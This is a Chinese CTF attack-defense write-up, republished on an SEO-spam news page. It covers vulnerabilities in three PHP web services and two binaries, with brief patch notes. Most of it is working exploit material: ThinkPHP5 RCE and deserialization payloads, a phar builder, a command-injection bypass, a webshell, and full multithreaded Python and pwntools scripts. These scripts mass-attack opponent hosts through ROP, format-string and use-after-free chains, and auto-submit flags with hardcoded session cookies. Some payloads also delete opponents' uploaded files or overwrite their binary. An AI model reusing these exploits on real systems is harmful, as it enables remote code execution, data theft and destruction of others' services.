当前位置: 首页 > news >正文

深圳市seo推广联系方式/江苏seo团队

news 2025/8/16 16:58:40
深圳市seo推广联系方式,江苏seo团队,城市焦点商城网站建设案例,p2p网站如何做推广web1这个题目我一共找到了四个漏洞。Thinkphp5rce1?sindex/think\app/invokefunction&functioncall_user_func_array&vars[0]system&vars[1][]cat /flag这个可以直接打,修复方案如下在App.php的第375行加入一个正则的过滤,即可修复,这个是官…

web1

这个题目我一共找到了四个漏洞。

Thinkphp5rce1

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

这个可以直接打,修复方案如下

App.php的第375行加入一个正则的过滤,即可修复,这个是官方的方法,因为thinkphp我比较熟悉所以就直接按照官方的方法修复了。

66dcf3df6bfee8ff2910652b8a31f2df.png

thinkphp5rce2

s=cat /flag&_method=__construct&method=&filter[]=system

这个是通过post方法进行传值,没有找到官方的修复方案,但事实上上面那个修了以后这个也就修掉了,为了保险起见我还是做了个双保险。在Request.php里面粗暴的修复了一下

c02c5eb7a0f65b2e95a343ec0b9ba5c1.png

反序列化1

链子还是很简单的,甚至没有链子,直接可以利用,就在入口文件index.php

2f1c03de8abac914693bd008601f2bdd.png

然后这里简单的反序列化点在Index.php

db1dc657203d63938899ac7e1b9687e4.png

修复方案,我是直接加了个正则进行替换,把所有字母替换成空,这里就没用了。但想想,这种方法还不如直接把代码删了。

批量利用脚本

import requestsimport refrom lxml import etreeimport timeimport threadingiptables = '''39.100.119.37:1018039.100.119.37:1038039.100.119.37:1048039.100.119.37:1058039.100.119.37:1068039.100.119.37:1078039.100.119.37:1088039.100.119.37:1098039.100.119.37:1108039.100.119.37:1118039.100.119.37:1128039.100.119.37:1138039.100.119.37:1148039.100.119.37:1158039.100.119.37:1168039.100.119.37:1178039.100.119.37:1188039.100.119.37:1198039.100.119.37:1208039.100.119.37:1218039.100.119.37:1228039.100.119.37:1238039.100.119.37:12480'''.split('\n')def find_flag(data):    reg = "flag{(.*?)}"    tmp = re.findall(reg, data)    result = []    for i in tmp:        i = 'flag{'+i+'}'        return idef ip_log(flag):    f = open('flag1.txt', 'a')    f.write(flag + "\n")    f.close()def attack(ip):    url2 = "http://" + ip + "/?s=index/index/unse&a=Tzo0OiJDb3JlIjoxOntzOjQ6ImRhdGEiO3M6MjA6InN5c3RlbSgnY2F0IC9mbGFnJyk7Ijt9"    response = requests.get(url2)    flag = find_flag(response.text)    ip_log(flag)    print(ip, ":", flag)for ip in iptables:    t = threading.Thread(target=attack, args=(ip, ))    t.start()

phar反序列化

这里有个上传功能,还有个文件读取功能,用脚趾头想想就知道是phar反序列化

修复方案我直接加了个过滤,把phar协议给过滤掉了。

76db8642c1b87eb3f13e40f95768e6de.png

6cfe793fd11455d9d1db8918573fd361.png

phar脚本

phpclass Core{    public $data;    public function __construct(){        $this->data="system('cat /flag;rm rm /var/www/html/public/uploads/20200314/*');";    }}$obj = new Core();@unlink("yds.phar");$phar = new Phar("yds.phar");$phar->startBuffering();$phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>");$phar->setMetadata(new Core());$phar->addFromString("yds.txt", "yds_is_so_beautiful");$phar->stopBuffering();rename('yds.phar', 'yds.gif');

批量脚本

import requestsimport refrom lxml import etreeimport timeimport threadingfrom requests import sessioniptables = '''39.100.119.37:1018039.100.119.37:1038039.100.119.37:1048039.100.119.37:1058039.100.119.37:1068039.100.119.37:1078039.100.119.37:1088039.100.119.37:1098039.100.119.37:1108039.100.119.37:1118039.100.119.37:1128039.100.119.37:1138039.100.119.37:1148039.100.119.37:1158039.100.119.37:1168039.100.119.37:1178039.100.119.37:1188039.100.119.37:1198039.100.119.37:1208039.100.119.37:1218039.100.119.37:1228039.100.119.37:1238039.100.119.37:12480'''.split('\n')def find_flag(data):    reg = "flag{(.*?)}"    tmp = re.findall(reg, data)    result = []    for i in tmp:        i = 'flag{'+i+'}'        return idef ip_log(flag):    f = open('flag1.txt', 'a')    f.write(flag + "\n")    f.close()def attack(ip):    url1 = "http://"+ip+"/index.php/Index/index/upload"    files = {'image': open('yds.gif', 'rb')}    s = session()    response = s.post(url1, files=files)    url2 = "http://"+ip+"/?file=phar://uploads/" + response.text.split('.gif')[0] + '.gif'    response2 = s.get(url2)    flag = find_flag(response2.text)    ip_log(flag)    print(ip, ":", flag)for ip in iptables:    t = threading.Thread(target=attack, args=(ip, ))    t.start()

web2

01

比赛首先开的是web2,源码拉下来,用刚更新的D盾没有扫出来任何东西。夜莫离师傅黑盒测到login.php左下方有打印出flag

a176556668a682733599151017ec74ca.png

直接删除这行,然后写批量脚本直接打

02

王叹之师傅发现了/admin/index.php并修复了。当时我在手动拿login.php的flag,并且写脚本,没去注意看。结果手动拿的还忘记交了flag。

/admin/index.php$uname = addslashes( $_SESSION['username']);if ($uname =="admin"){    system('cat /flag');}

赛后我看了下源码,这里的利用,可以通过config.php找到用户名root,密码空,直接进入数据库,可以查看数据库中user表中的admin的密码,通过login.php以admin身份登陆进入,就可以在页面获得flag

03

夜莫离师傅看到日志里的访问,然后找到的变量覆盖漏洞,但是没找到可以利用的地方,我觉得是可以利用的,因为有很多数据库有关的php页面包含config.php。明天本地试验一下

$black_list = ["_GET","_POST","_COOKIE"];foreach ($_GET as $k => $v) {    if ($k == $black_list){        exit("?");    }    $$k = $v;}foreach ($_POST as $k => $v) {    if ($k == $black_list){        exit("?");    }    $$k = $v;}

防御的话直接在黑名单里加上session

$black_list = ["_GET","_POST","_COOKIE","_SESSION"];

04

王叹之师傅修改了/upload/upload.php中的代码,本来是黑名单,将其修改为.jpg.png之类的白名单,更加的安全。因为黑名单太危险,总有可以绕过去的。

$black_list = ["ini","htacces","php","ph3","html"];
		$ext=pathinfo($name)['extension'];
		$ext =strtolower($ext);
		if (in_array($ext,$black_list)){
            exit("fuck you hacker;");

05

  • file_operate.php,中有echo file_get_contents($item[1]);,可能存在任意文件读取,修复一下,设置个if,直接简单粗暴点,ban掉flag,实际上,waf里ban的很全了

  • upload.php中的几个读文件的操作同理

骚套路:在日志请求中找到很多session,可在平台处替换session直接登录别人页面

web3

我稍微审计了下,html目录里

01

readme.md存在一句话木马,然后.htaccess是这么包含的

AddType application/x-httpd-php .html .md

02

王叹之师傅审计出来的反序列化点,但是我去利用发现不行,很奇怪,正常是可以的。也可能是我利用的比较晚,大家都修了。

class home{
    public $method;
    public $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
    function __destruct(){
        var_dump($this->method);
        ($this->method)($this->args);
    }
}
     $a=$_REQUEST['a'];
    unserialize($a);

03

这里有几个命令执行

function waf($str){
    $str=str_replace(' ','',$str);
    $str=str_replace(';','',$str);
    $str=str_replace('|','',$str);
    return $str;
}
function ping($host){
    $host=waf($host);
    var_dump($host);
    system("ping -c 1 $host");
}
if(isset($_REQUEST[1]))
    ping($_REQUEST[1]);

waf过滤少过滤了一个,&

127.0.0.1&whoami

04

User.php

这里面有个弱口令

    function Login(){
        if (!empty($_POST['username']) and !empty($_POST['password'])){
            $username=$_POST['username'];
            $password=md5($_POST['password']);
              if($username=='admin' && $password=='21232f297a57a5a743894a0e4a801fc3'){
                // $data = mysql_fetch_assoc($result);
                $_SESSION['username']=$username;
                header("Location: ./index.php?c=User&a=home");
            }else{
                exit("password error!");
            }
        }
    }

pwn1

爆破栈帧。

system后门:

#!/usr/bin/python2
# -*- coding:utf-8 -*-
from pwn import *
import time, signal
from submit_flag import submit_flag as sf # for fast
interval = 60
execve_file = './pwn'
libc_file = '/lib/x86_64-linux-gnu/libc.so.6'
# libc_file = './libc-2.27.so'
scope = [i + 1 for i in range(25)]
filter = [1,2 , 13]
def end_handle(signum=None, stack=None): exit(0)
for sig in [signal.SIGINT, signal.SIGHUP, signal.SIGTERM]: signal.signal(sig, end_handle)
context.arch = 'amd64'
# context.arch = 'i386'
context.log_level = 'debug'
elf = ELF(execve_file)
libc = ELF(libc_file)
import string
number = string.digits
print(number)
while(True):
    for v in scope:
        if(v not in filter):
            print('team %02d' %(v))
            time.sleep(1)
            try:
                sh = remote('39.100.119.37', '4%02d80' % (v))
                result = 'a' * 0x100
                tail = -1
                i =  0
                n = 0
                while(i < 0x40):
                    sh.sendline('a')
                    result = sh.recvuntil(' input')
                    sh.sendline('a')
                    result = sh.recvuntil(' input')
                    tail = result.rfind('a') + 1
                    n = ord(result[tail])
                    if(n < 0x30 or n > 0x80 or number.find(result[tail + 1]) != -1 ):
                        sh.close()
                        sh = remote('39.100.119.37', '4%02d80' % (v))
                    else:
                        break
                    i += 1
                if(i == 0x40):
                    sh.close()
                    continue
                i =  0
                while(i < 0x100):
                    if(ord(result[28]) != 0x31):
                        sh.sendline('a')
                        result = sh.recvuntil(' input')
                        tail = result.rfind('a') + 1
                        # print(result[tail])
                    else:
                        sh.sendline('-')
                        break
                    i += 1
                if(i == 0x100):
                    sh.close()
                    continue
                sh.sendline('cat flag')
                sh.recvuntil('flag')
                flag = 'flag' + sh.recvrepeat(1)
                print(flag)
                # try:
                sf(flag, 4)
                sh.close()
            except EOFError as e: sh.close()
    # time.sleep(interval)

233后门:

#!/usr/bin/python2
# -*- coding:utf-8 -*-
from pwn import *
import time, signal
from submit_flag import submit_flag as sf # for fast
interval = 60
execve_file = './pwn'
libc_file = '/lib/x86_64-linux-gnu/libc.so.6'
# libc_file = './libc-2.27.so'
scope = [i + 1 for i in range(25)]
filter = [1,2 , 3, 4, 5, 13]
def end_handle(signum=None, stack=None): exit(0)
for sig in [signal.SIGINT, signal.SIGHUP, signal.SIGTERM]: signal.signal(sig, end_handle)
context.arch = 'amd64'
# context.arch = 'i386'
context.log_level = 'debug'
elf = ELF(execve_file)
libc = ELF(libc_file)
import string
number = string.digits
print(number)
while(True):
    for v in scope:
        if(v not in filter):
            print('team %02d' %(v))
            time.sleep(1)
            try:
                sh = remote('39.100.119.37', '4%02d80' % (v))
                result = 'a' * 0x100
                tail = -1
                i = 0
                all = 0x100
                while(i < all):
                    sh.sendline('a')
                    result = sh.recvuntil(' input')
                    sh.sendline('a')
                    result = sh.recvuntil(' input')
                    sh.sendline('a')
                    result = sh.recvuntil(' input')
                    tail = result.rfind('a') + 1
                    n = ord(result[tail])
                    if(result[tail + 1] != '3' ):
                        sh.close()
                        print(result[tail + 1])
                        # time.sleep(1)
                        sh = remote('39.100.119.37', '4%02d80' % (v))
                    else:
                        break
                    i += 1
                if(i == all):
                    sh.close()
                    continue
                i = 0
                while(i < 0x1000):
                    if(result[28] != '3'):
                        sh.sendline('a')
                        result = sh.recvuntil(' input')
                        tail = result.rfind('a') + 1
                        # print(result[tail])
                    else:
                        print(result)
                        print(result[tail])
                        sh.send('2')
                        break
                    i += 1
                if(i == 0x1000):
                    sh.close()
                    continue
                layout = [
                    0,
                    0x0000000000400ce3,
                    elf.got['puts'],
                    elf.plt['puts'],
                    elf.symbols['gift'],
                ]
                time.sleep(10)
                sh.recv()
                sh.send('a' * 0x40 + flat(layout))
                libc_addr = u64(sh.recvn(6) + '\0\0') - libc.symbols['puts']
                success('libc_addr: ' + hex(libc_addr) )
                layout = [
                    0,
                    0x0000000000400ce3,
                    libc_addr + libc.search('/bin/sh\0').next(),
                    libc_addr + libc.symbols['system'],
                    elf.symbols['gift'],
                ]
                sh.send('a' * 0x40 + flat(layout))
                sh.sendline('cat flag')
                sh.recvuntil('flag')
                flag = 'flag' + sh.recvrepeat(1)
                print(flag)
                # try:
                sf(flag, 4)
                sh.close()
            except EOFError as e: sh.close()
    # time.sleep(interval)

pwn2

pwn2的洞比较多:

  while ( v1 )
  {
    read(0, &buf, 0x80uLL);
    printf((const char *)&buf, &buf);
    --v1;
  }

格式化串加上栈溢出

UAF:

  printf("index>> ", a2);
  v2 = sub_11F2();
  v5 = v2;
  v3 = *((_QWORD *)&unk_202100 + 2 * v2);
  if ( v3 )
  {
    free(*((void **)&unk_202100 + 2 * v5));
    LODWORD(v3) = puts("dele success");
  }
  return v3;

两种利用脚本:

#coding=utf-8
from pwn import *
import requests
import json
local = 1
exec_file="./pwn"
context.binary=exec_file
context.terminal=["tmux","splitw","-h"]
elf=ELF(exec_file,checksec = False)
def get_base(a):
    text_base = a.libs()[a._cwd+a.argv[0].strip('.')]
    for key in a.libs():
        if "libc.so.6" in key:
            return text_base,a.libs()[key]
def debug():
    text_base,libc_base=get_base(a)
    script="set $text_base="+str(text_base)+'\n'+"set $libc_base="+str(libc_base)+'\n'
    script+='''
    b *($text_base+0x0000000000012E7)
    '''
    gdb.attach(a,script)
def fuck(address):
    n = globals()
    for key,value in n.items():
        if value == address:
            return success(key+"  ==>  "+hex(address))
def subflag(flag):
    # headers = {'Content-Type': 'application/json'}
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36",
        "Accept": "*/*",
        "Accept": "application/json",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
         "CSRF-Token":'cef74a1cbd40a379d2e024d4d7e87ca909c0a8ce28439155fb895a03a7a560dc',
        'Content-Type': 'application/json',
        'Cookie': "session=2f70504d-d929-484b-b47a-a6e66446166c"
    }
    url = "http://39.100.119.37:8001/api/v1/challenges/attempt"
    data = {"challenge_id":5,"submission":flag}
    r = requests.post(url,headers=headers,data = json.dumps(data))
    print(r.text)
def menu(idx):
    a.sendlineafter("",str(idx))
def add(size,content):
    menu(1)
    a.sendlineafter("",str(size))
    a.sendafter("",content)
def delete(idx):
    menu()
    a.sendlineafter("",str(idx))
def show(idx):
    menu()
    a.sendlineafter("",str(idx))
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec = False)
def exp(ip,p):
    a=remote(ip,p)
    times = 2
    a.sendafter("name:\n",'A')
    a.sendlineafter("Darkness is coming\n",str(1))
    a.sendafter("times >> ",str(times)+'\n')
    #debug()
    payload = '%13$pA%15$pB%27$pC'
    a.send(payload)
    canary = eval(a.recvuntil("A",drop=True))
    text_base = eval(a.recvuntil("B",drop=True))-0x17b4
    libc_base = eval(a.recvuntil("C",drop=True))-240-libc.symbols['__libc_start_main']
    payload = 'A'*0x28+p64(canary)
    payload += p64(0)
    payload +=p64(0x0000000000001863+text_base)
    payload += p64(libc_base+next(libc.search("/bin/sh")))
    payload += p64(libc_base+libc.symbols["system"])
    sleep(1)
    a.send(payload.ljust(0x80,'\x00'))
    a.sendline("cat flag")
    a.recvuntil("flag")
    flag = "flag"+a.recvuntil("}")
    a.close()
    return flag
if __name__ == "__main__":
    port=[]
    for i in range(2,25):
        if i == 11:
            continue
        port.append("5"+str(i).rjust(2,'0')+"80")
    ip="39.100.119.37"
    while 1:
        for i in port:
            try:
                data = exp(ip,i)
                print data
                subflag(data)
            except Exception as e:
                print e
                continue
        print "=====================done======================"
        sleep(120)

UAF的利用脚本:

#coding=utf-8
from pwn import *
import requests
import json
local = 1
exec_file="./pwn"
context.binary=exec_file
context.terminal=["tmux","splitw","-h"]
elf=ELF(exec_file,checksec = False)
context.log_level="debug"
def get_base(a):
    text_base = a.libs()[a._cwd+a.argv[0].strip('.')]
    for key in a.libs():
        if "libc.so.6" in key:
            return text_base,a.libs()[key]
def debug():
    text_base,libc_base=get_base(a)
    script="set $text_base="+str(text_base)+'\n'+"set $libc_base="+str(libc_base)+'\n'
    script+='''
    b *($text_base+0x0000000000012E7)
    '''
    gdb.attach(a,script)
def fuck(address):
    n = globals()
    for key,value in n.items():
        if value == address:
            return success(key+"  ==>  "+hex(address))
def subflag(flag):
    # headers = {'Content-Type': 'application/json'}
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36",
        "Accept": "*/*",
        "Accept": "application/json",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
         "CSRF-Token":'cef74a1cbd40a379d2e024d4d7e87ca909c0a8ce28439155fb895a03a7a560dc',
        'Content-Type': 'application/json',
        'Cookie': "session=2f70504d-d929-484b-b47a-a6e66446166c"
    }
    url = "http://39.100.119.37:8001/api/v1/challenges/attempt"
    data = {"challenge_id":5,"submission":flag}
    r = requests.post(url,headers=headers,data = json.dumps(data))
    print(r.text)
a=""
def menu(idx):
    a.sendlineafter("Your Choice>> ",str(idx))
def add(idx,size,content):
    menu(1)
    a.sendlineafter("index>> ",str(idx))
    a.sendlineafter("size>> ",str(size))
    a.sendafter("name>> ",content)
def delete(idx):
    menu(2)
    a.sendlineafter("index>> ",str(idx))
def show(idx):
    menu(5)
    a.sendlineafter("index>> ",str(idx))
def edit(idx,content):
    menu(3)
    a.sendafter("name>> ",content)
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec = False)
def exp(ip,p):
    global a
    a = remote(ip,p)
    a.sendlineafter("name:\n","1")
    a.sendlineafter("ing\n","3")
    add(0,0x90,'A')
    add(1,0x68,'A')
    add(2,0x68,'A')
    delete(0)
    show(0)
    libc_base=u64(a.recvuntil("\n",drop=True)+'\x00\x00')-libc.symbols["__malloc_hook"]-0x10-88
    print hex(libc_base)
    delete(1)
    delete(2)
    delete(1)
    add(3,0x68,p64(libc_base+libc.symbols["__malloc_hook"]-0x23))
    add(4,0x68,p64(libc_base+libc.symbols["__malloc_hook"]-0x23))
    add(5,0x68,p64(libc_base+libc.symbols["__malloc_hook"]-0x23))
    add(6,0x68,'A'*0x13+p64(libc_base+0xf1147))
    menu(1)
    a.sendlineafter("index>> ",str(7))
    a.sendlineafter("size>> ",str(0x6))
    a.sendline("echo 1 > ./pwn")
    a.sendline("cat flag")
    a.recvuntil("flag")
    flag = "flag"+a.recvuntil("}")
    a.close()
    return flag
    a.interactive()
#exp("39.100.119.37",52380)
if __name__ == "__main__":
    port=[]
    for i in range(2,25):
        if i == 11:
            continue
        port.append("5"+str(i).rjust(2,'0')+"80")
    ip="39.100.119.37"
    while 1:
        for i in port:
            try:
                data = exp(ip,i)
                print data
                subflag(data)
            except Exception as e:
                print e
                continue
        print "=====================done======================"
        sleep(120)

496bb84896ddb64310b3e19424b9664f.png

http://www.lbrq.cn/news/760447.html

相关文章:

  • 怎么做幼儿园的网站/黑帽seo排名技术
  • 应聘网站运营建设面试/淘宝自动推广软件
  • 国内访问wordpress/常州seo收费
  • 外贸网站都有哪些/网络推广公司收费标准
  • 一个专门做标题的网站/百度竞价推广的技巧
  • 深圳做微信商城网站建设/企业网站推广方法实验报告
  • 眉山政府网站建设/什么是百度搜索推广
  • 网站建设中模板/厦门seo推广公司
  • 男女性直接做的视频网站/杭州seo培训
  • 网站的图形拖拽验证码怎么做的/郑州关键词seo
  • 怎么用网页制作一个网站/成都网站建设公司
  • 中国纪检监察网站首页/360推广和百度推广哪个好
  • wordpress手机端网站模板下载失败/免费b站推广网站不
  • 做网站banner是什么意思/网站seo优化徐州百度网络
  • 网站交互怎么做的/网站怎么开发
  • 金昌做网站/nba赛季排名
  • 网站制度建设存在的问题/windows11优化大师
  • 产品网站策划书方案/seo入门培训学多久
  • 北京团建网站/百度网盘网页版
  • 网站建设 公司 常见问题/郑州制作网站公司
  • 做网站选什么主机/推广软文营销案例
  • 恩施建设银行网站/管理培训班
  • 杭州集团公司网站制作/关键词seo价格
  • 曹县商城网站建设/搜索引擎营销的内容和层次有哪些
  • 做网站建设一年能赚多少/潍坊seo教程
  • 网站被host重定向是什么意思/最好用的免费建站平台
  • 免费网站登录口看完你会感谢我/营销网络建设
  • 专业做网站企业/湖南企业seo优化报价
  • 长春代做网站/深圳 网站制作
  • 个人域名备案网站名称/打开百度一下你就知道
  • Android RxJava变换操作符详解
  • P5967 [POI 2016] Korale 题解
  • 一款开源的远程桌面软件,旨在为用户提供流畅的游戏体验,支持 2K 分辨率、60 FPS,延迟仅为 40ms。
  • 深度学习-卷积神经网络CNN-膨胀卷积、可分离卷积(空间可分离、深度可分离)、分组卷积
  • Vscode的wsl环境开发ESP32S3的一些问题总结
  • 搭建局域网yum源仓库全流程